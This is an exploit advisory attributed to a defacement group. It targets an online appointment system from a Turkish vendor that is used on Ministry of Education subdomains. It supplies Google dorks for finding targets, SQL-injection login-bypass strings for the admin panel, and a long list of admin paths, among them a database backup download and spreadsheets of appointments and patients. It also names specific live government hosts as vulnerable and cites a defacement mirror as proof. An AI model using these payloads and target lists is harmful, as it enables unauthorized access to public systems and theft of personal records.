##########################################################################################################
# Exploit Title : Webmaster Atom Bilgisayar Yazılım Danışmanllık Ministry of Education TR *.subdomains
RAM Online Appointment Atom Computers Unauthenticated Access Control Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 15/10/2018
# Vendor Homepage : atombilgisayar.com.tr
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Webmaster Atom Bilgisayar Yazılım Danışmanllık'' site:meb.gov.tr
inurl:''/randevu/index.php?sayfa=rapor'' site:meb.gov.tr
inurl:''/randevu/index.php?sayfa=iletisim'' site:meb.gov.tr
# Exploit Risk : Medium
# CWE : CWE-287 - [ Improper Authentication ] - CWE-592 - [ Authentication Bypass Issues ] -
CWE-284 - [ Improper Access Control ] - CWE-264 - [ Permissions, Privileges, and Access Controls ]
##########################################################################################################
# Webmaster Atom Computer Software Counselling Improper Access Control Vulnerability
# Admin Panel Login Path :
/randevu/admin/
/onlinerandevu/admin/
# Authentication Bypass Exploit :
Admin Username :
anything' OR 'x'='x
Admin Password :
anything' OR 'x'='x
You can also try these alternatives:
1' or 1=1 -- -
1' or 1=1 -- -
'=''or'
'=''or'
# Useable Admin Control Panel URL Links Exploits =>
/randevu/admin/index.php
/randevu/admin/index3.php
/randevu/admin/yedekal.php => SQL Database Backup Arbitrary File Download
/admin/randevu.xls
/onlinerandevu/admin/hasta.xls
/randevu/admin/sifre.php
/randevu/admin/resetle.php
/randevu/admin/index4.php
/randevu/admin/ogretmen.php
/randevu/admin/karar.php
/randevu/admin/egitsel.php
/randevu/admin/test.php
/randevu/admin/sebeb.php
/randevu/admin/tani.php
/randevu/admin/destek.php
/randevu/admin/oneri.php
/randevu/admin/index1.php
/randevu/admin/dr.php
/randevu/admin/saat.php
/randevu/admin/basvuru.php
/randevu/admin/sart.php
/randevu/admin/hastalik.php
/randevu/admin/site.php
/randevu/admin/ilce.php
/randevu/admin/okul.php
/randevu/admin/kademe.php
/randevu/admin/tatil.php
/randevu/admin/index5.php
/randevu/admin/randevu.php
/randevu/admin/liste.php
/randevu/admin/page1.php
/randevu/admin/rapor.php
/admin/admin.php?islem=randevu&randevu=listele
/admin/admin.php?islem=ogretmen
/admin/admin.php?islem=kullanici
/randevu/admin/admin.php?islem=tarih
/randevu/admin/admin.php?islem=saat
/randevu/admin/admin.php?islem=okul
/randevu/admin/admin.php?islem=randevu&randevu=dokum_ver
/randevu/admin/admin.php?islem=randevu&randevu=arsiv
/randevu/admin/admin.php?islem=randevu&randevu=reddedilen
/randevu/admin/admin.php?islem=randevu&randevu=rezerve
# Directory Paths =>
/randevu/index.php?sayfa=iletisim
/randevu/index.php?sayfa=iptal
/randevu/index.php?sayfa=sorgu
/randevu/index.php?sayfa=rapor
/randevu/index.php?sayfa=%F6gretmen%20giri%FEi
##########################################################################################################
Example Vulnerable Sites *.subdomains of meb.gov.tr =>
bucaram.meb.gov.tr/randevu/admin/ => [ Proof of Concept ] => zone-h.org/mirror/id/31762392
randevu.atombilgisayar.com.tr/admin/
fatsaram.meb.gov.tr/randevu/admin/
adiyamanram.meb.gov.tr/randevu/admin/
tavsanliram.meb.gov.tr/randevu/admin/
sokeram.meb.gov.tr/randevu/admin/
sancakteperam.meb.gov.tr/randevu/admin/
pendikram.meb.gov.tr/randevu/admin/
kilisram.meb.gov.tr/randevu/admin/
kcekmeceram.meb.gov.tr/randevu/admin/
esenlerram.meb.gov.tr/randevu/admin/
bakirkoyram.meb.gov.tr/randevu/admin/
bahcelievlerram.meb.gov.tr/randevu/admin/
arnavutkoyram.meb.gov.tr/randevu/admin/
boluram.meb.gov.tr/randevu/admin/
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################